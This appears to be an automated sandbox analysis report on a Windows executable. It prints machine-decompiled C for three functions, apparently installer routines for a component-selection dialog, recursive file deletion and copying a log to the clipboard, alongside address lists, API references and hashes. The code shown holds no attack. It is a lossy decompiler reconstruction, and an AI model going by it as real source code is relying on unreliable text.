              • Instruction Fuzzy Hash: ACA1E570908341AED7217F729C4AB2B7EACEB45309F04483FF540B61D2CB7CA9458A6E
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404802, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478windowmemoryCOMMONCrypto
              Download Yara Rule
              C-Code - Quality: 97%
              			E00404802(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x42ec48;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x42ec30 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x42ec39 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E00404782(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x42ec38) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x42a07c;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42a094;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x42a07c = _t315;
								 *0x42a094 = _t315;
								 *0x42ec80 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x42ec39 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42a094;
									_t196 =  *0x42ec48;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x42ec4c <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42e3fc + 0x10)) != _t315) {
											E0040473D(0x3ff, 0xfffffffb, E00404755(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x42ec4c);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42a094);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x42ec80 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42a094 = GlobalAlloc(0x40,  *0x42ec4c << 2);
					_t250 = LoadBitmapA( *0x42ec20, 0x6e);
					 *0x42a088 =  *0x42a088 | 0xffffffff;
					_v24 = _t250;
					 *0x42a090 = SetWindowLongA(_v8, 0xfffffffc, E00404E03);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42a07c = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x42a07c);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405BE9(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E83(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E83(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x42ec4c <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42a094 + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42a094 + _t318 * 4) = _t274;
									_t288 =  *( *0x42a094 + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x42ec4c);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403EB8(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403EB8(_v12);
								L89:
								return E00403EEA(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































              0x00404820
              0x00404826
              0x00404828
              0x0040482e
              0x00404834
              0x00404841
              0x0040484a
              0x0040484d
              0x00404850
              0x00404a78
              0x00404a7f
              0x00404a93
              0x00404a81
              0x00404a83
              0x00404a86
              0x00404a87
              0x00404a8e
              0x00404a8e
              0x00404a9f
              0x00404aad
              0x00404ab0
              0x00404ac6
              0x00404b3e
              0x00404b41
              0x00404b43
              0x00404b4d
              0x00404b5b
              0x00404b5b
              0x00404b5d
              0x00404b67
              0x00404b6d
              0x00404b8e
              0x00404b6f
              0x00404b7c
              0x00404b7c
              0x00404b6d
              0x00404b67
              0x00000000
              0x00404b41
              0x00404acb
              0x00404ad6
              0x00404adb
              0x00404ae2
              0x00404ae9
              0x00404af3
              0x00404af3
              0x00404af7
              0x00404afc
              0x00404b01
              0x00404b17
              0x00404b03
              0x00404b03
              0x00404b0b
              0x00404b12
              0x00404b0d
              0x00404b0d
              0x00404b0d
              0x00404b0b
              0x00404b1b
              0x00404b1d
              0x00404b2b
              0x00404b2c
              0x00404b38
              0x00404b3b
              0x00404b3b
              0x00404afc
              0x00000000
              0x00404ae9
              0x00404acd
              0x00404ad4
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404b91
              0x00404b91
              0x00404b98
              0x00404c0c
              0x00404c13
              0x00404c1f
              0x00404c1f
              0x00404c28
              0x00404c2a
              0x00404c31
              0x00404c34
              0x00404c34
              0x00404c3a
              0x00404c41
              0x00404c44
              0x00404c44
              0x00404c4a
              0x00404c50
              0x00404c56
              0x00404c56
              0x00404c63
              0x00404db0
              0x00404db7
              0x00404dd4
              0x00404dda
              0x00404dec
              0x00404dec
              0x00000000
              0x00404c69
              0x00404c6b
              0x00404c73
              0x00404c77
              0x00404c77
              0x00404c7f
              0x00404cc0
              0x00404cc2
              0x00404cd2
              0x00404cd5
              0x00404cda
              0x00404ce1
              0x00404ce4
              0x00404d86
              0x00404d8c
              0x00404d9a
              0x00404dab
              0x00404dab
              0x00000000
              0x00404d9a
              0x00404cea
              0x00404ced
              0x00404cf3
              0x00404cf8
              0x00404cfa
              0x00404cfc
              0x00404d02
              0x00404d09
              0x00404d0e
              0x00404d15
              0x00404d18
              0x00404d18
              0x00404d1f
              0x00404d2b
              0x00404d2f
              0x00404d31
              0x00404d31
              0x00404d21
              0x00404d23
              0x00404d23
              0x00404d51
              0x00404d5d
              0x00404d6c
              0x00404d6c
              0x00404d6e
              0x00404d71
              0x00404d7a
              0x00000000
              0x00404c81
              0x00404c8c
              0x00404c8f
              0x00404c94
              0x00404c96
              0x00404c9a
              0x00404caa
              0x00404cb4
              0x00404cb6
              0x00404cb9
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x00404c9c
              0x00404c9c
              0x00404ca2
              0x00404ca4
              0x00404ca4
              0x00404ca5
              0x00404ca6
              0x00000000
              0x00404c9c
              0x00404c7f
              0x00404c63
              0x00404ba0
              0x00000000
              0x00404bb6
              0x00404bc0
              0x00404bc5
              0x00000000
              0x00000000
              0x00404bd7
              0x00404bdc
              0x00404be8
              0x00404be8
              0x00404bea
              0x00404bf9
              0x00404bfb
              0x00404c02
              0x00404c05
              0x00000000
              0x00404c05
              0x00404ba0
              0x00404856
              0x0040485b
              0x00404865
              0x00404866
              0x0040486f
              0x0040487a
              0x00404885
              0x0040488b
              0x00404899
              0x004048ae
              0x004048b3
              0x004048be
              0x004048c7
              0x004048dc
              0x004048ed
              0x004048fa
              0x004048fa
              0x004048ff
              0x00404905
              0x00404907
              0x0040490a
              0x0040490f
              0x00404914
              0x00404916
              0x00404916
              0x00404936
              0x00404936
              0x00404938
              0x00404939
              0x0040493e
              0x00404941
              0x00404944
              0x00404948
              0x0040494d
              0x00404952
              0x00404956
              0x0040495b
              0x00404960
              0x00404962
              0x0040496a
              0x00404a34
              0x00404a47
              0x00000000
              0x00404970
              0x00404973
              0x00404976
              0x00404979
              0x00404979
              0x0040497f
              0x00404985
              0x00404988
              0x0040498e
              0x0040498f
              0x00404994
              0x0040499d
              0x004049a4
              0x004049a7
              0x004049aa
              0x004049ad
              0x004049e9
              0x00404a12
              0x004049eb
              0x004049f8
              0x004049f8
              0x004049af
              0x004049b2
              0x004049c1
              0x004049cb
              0x004049d3
              0x004049da
              0x004049e2
              0x004049e2
              0x004049ad
              0x00404a18
              0x00404a19
              0x00404a25
              0x00404a25
              0x00404a32
              0x00404a4d
              0x00404a51
              0x00404a6e
              0x00404a73
              0x00404a76
              0x00000000
              0x00404a53
              0x00404a58
              0x00404a61
              0x00404dee
              0x00404e00
              0x00404e00
              0x00404a51
              0x00000000
              0x00404a32
              0x0040496a

              APIs
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
              • String ID: $M$N
              • API String ID: 1638840714-813528018
              • Opcode ID: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction ID: 6f0a98d5dd10ef4145f29f69d97320cca22844812bd755e22afdd9aff1593a00
              • Opcode Fuzzy Hash: 03cda6e4da2b8fb4d01f8465d39c3ee25f13877e52dcc6e8ff3e3942391822dc
              • Instruction Fuzzy Hash: A702B1B0A00209EFEB25CF95DD45AAE7BB5FB84314F10413AF610BA2E1C7799A41CF58
              Uniqueness

              Uniqueness Score: -1.00%

              Function 004054EC, Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 156filestringCOMMON
              Download Yara Rule
              C-Code - Quality: 98%
              			E004054EC(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E0040579B(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72);
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x42eca8 =  *0x42eca8 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405BC7(0x42b0a8, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E00405701(_t72);
					} else {
						lstrcatA(0x42b0a8, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x409010);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x42b0a8,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004056E5( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405BC7(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040587F(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404EB3(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x42eca8 =  *0x42eca8 + 1;
										} else {
											E00404EB3(0xfffffff1, _t72);
											E00405915(__eflags, _t72, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004054EC(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x42b0a8 - 0x5c;
					if( *0x42b0a8 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405EC2(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E004056BA(_t72);
							E0040587F(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404EB3(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404EB3(0xfffffff1, _t72);
							return E00405915(__eflags, _t72, 0);
						}
						L33:
						 *0x42eca8 =  *0x42eca8 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















              0x004054f7
              0x004054fb
              0x00405504
              0x00405507
              0x0040550a
              0x00405512
              0x00405514
              0x00405515
              0x00000000
              0x00405515
              0x00405524
              0x00405524
              0x00405527
              0x0040552a
              0x0040553e
              0x00405545
              0x0040554a
              0x0040554c
              0x0040555c
              0x0040554e
              0x00405554
              0x00405554
              0x00405561
              0x00405564
              0x0040556f
              0x00405575
              0x0040557a
              0x0040558a
              0x0040558c
              0x00405592
              0x00405595
              0x00405598
              0x00405655
              0x00405655
              0x00405659
              0x0040565b
              0x0040565b
              0x0040565b
              0x0040565b
              0x00000000
              0x00000000
              0x00000000
              0x00000000
              0x0040559e
              0x0040559e
              0x004055a7
              0x004055ad
              0x004055b2
              0x004055b5
              0x004055b7
              0x004055bb
              0x004055bd
              0x004055bd
              0x004055bb
              0x004055c0
              0x004055c3
              0x004055d6
              0x004055d8
              0x004055dd
              0x004055e4
              0x004055fc
              0x00405602
              0x00405608
              0x0040560a
              0x0040562f
              0x0040560c
              0x0040560c
              0x00405610
              0x00405624
              0x00405612
              0x00405615
              0x0040561d
              0x0040561d
              0x00405610
              0x004055e6
              0x004055ec
              0x004055ee
              0x004055f4
              0x004055f4
              0x004055ee
              0x00000000
              0x004055e4
              0x004055c5
              0x004055c8
              0x004055ca
              0x00000000
              0x00000000
              0x004055cc
              0x004055ce
              0x00000000
              0x00000000
              0x004055d0
              0x004055d4
              0x00000000
              0x00000000
              0x00000000
              0x00405634
              0x0040563e
              0x00405644
              0x00405644
              0x0040564f
              0x00000000
              0x0040564f
              0x00405566
              0x0040556d
              0x00000000
              0x00000000
              0x00000000
              0x0040552c
              0x0040552c
              0x0040552e
              0x0040565f
              0x00405662
              0x00405665
              0x004056b7
              0x004056b7
              0x004056b7
              0x00405667
              0x0040566a
              0x00405675
              0x0040567a
              0x0040567c
              0x00000000
              0x00000000
              0x0040567f
              0x00405685
              0x0040568b
              0x00405691
              0x00405693
              0x00000000
              0x004056af
              0x00405695
              0x00405699
              0x00000000
              0x00000000
              0x0040569e
              0x00000000
              0x004056a5
              0x0040566c
              0x0040566c
              0x00000000
              0x0040566c
              0x00405534
              0x00405538
              0x00000000
              0x00000000
              0x00000000
              0x00405538

              APIs
              • DeleteFileA.KERNEL32(?,?,00435400,?), ref: 0040550A
              • lstrcatA.KERNEL32(0042B0A8,\*.*,0042B0A8,?,00000000,?,00435400,?), ref: 00405554
              • lstrcatA.KERNEL32(?,00409010,?,0042B0A8,?,00000000,?,00435400,?), ref: 00405575
              • lstrlenA.KERNEL32(?,?,00409010,?,0042B0A8,?,00000000,?,00435400,?), ref: 0040557B
              • FindFirstFileA.KERNEL32(0042B0A8,?,?,?,00409010,?,0042B0A8,?,00000000,?,00435400,?), ref: 0040558C
              • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 0040563E
              • FindClose.KERNEL32(?), ref: 0040564F
              Strings
              Memory Dump Source
              • Source File: 00000005.00000002.673265206.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000005.00000002.673258437.0000000000400000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673275249.0000000000407000.00000002.00020000.sdmp Download File
              • Associated: 00000005.00000002.673281621.0000000000409000.00000008.00020000.sdmp Download File
              • Associated: 00000005.00000002.673290957.0000000000437000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
              • String ID: \*.*
              • API String ID: 2035342205-1173974218
              • Opcode ID: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
              • Instruction ID: 3bcb6ec240d98e814f0ac214cdfa27fda4082eb57bc811e5fc2e7534dee8d376
              • Opcode Fuzzy Hash: 40143870f9552ccee50e4944eef29081e6212fcf3057c5d2d5961ee8f08c50da
              • Instruction Fuzzy Hash: E0512430404A447ADF216B328C49BBF3AB8DF52319F54443BF809751D2CB3C59829EAD
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00404FF1, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278windowclipboardmemoryCOMMON
              Download Yara Rule
              C-Code - Quality: 95%
              			E00404FF1(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x42e404;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404F85, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405BE9(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x42a0a0;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42e3ec == _t149) {
							ShowWindow( *0x42ec28, 8);
							if( *0x42ecac == _t149) {
								E00404EB3( *((intOrPtr*)( *0x429870 + 0x34)), _t149);
							}
							E00403E5C(1);
							goto L25;
						}
						 *0x429468 = 2;
						E00403E5C(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403EEA(_a8, _a12, _a16);
						}
						ShowWindow( *0x42e3f0, _t149);
						ShowWindow(_t154, 8);
						E00403EB8(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x42ec30;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x42e3f0 = GetDlgItem(_a4, 0x403);
				 *0x42e3e8 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x42e404 = _t127;
				_v8 = _t127;
				E00403EB8( *0x42e3f0);
				 *0x42e3f4 = E00404755(4);
				 *0x42e40c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E83(_a4);
				if(( *0x42ec38 & 0x00000003) != 0) {
					ShowWindow( *0x42e3f0, _t149);
					if(( *0x42ec38 & 0x00000002) != 0) {
						 *0x42e3f0 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403EB8( *0x42e3e8);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x42ec38 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}
































              0x00404ffa
              0x00405000
              0x00405009
              0x0040500c
              0x004051a4
              0x004051c8
              0x004051c8
              0x004051db
              0x004051f9
              0x00405200
              0x00405257
              0x0040525b
              0x00000000
              0x00405262
              0x0040526a
              0x00405272
              0x00405275
              0x0040536e
              0x00000000
              0x0040536e
              0x00405284
              0x00405290
              0x00405296
              0x0040529c
              0x004052b1
              0x004052b7
              0x0040529e
              0x004052a3
              0x004052a9
              0x004052ac
              0x004052ac
              0x004052c7
              0x004052cf
              0x004052d2
              0x004052db
              0x004052de
              0x004052e5
              0x004052ec
              0x004052f4
              0x004052f4
              0x0040530b
              0x0040530b
              0x00405312
              0x00405318
              0x00405321
              0x00405328
              0x00405331
              0x00405333
              0x00405336
              0x00405345
              0x00405347
              0x0040534d
              0x0040534e
              0x0040534f
              0x00405357
              0x00405362
              0x00405368
              0x00405368
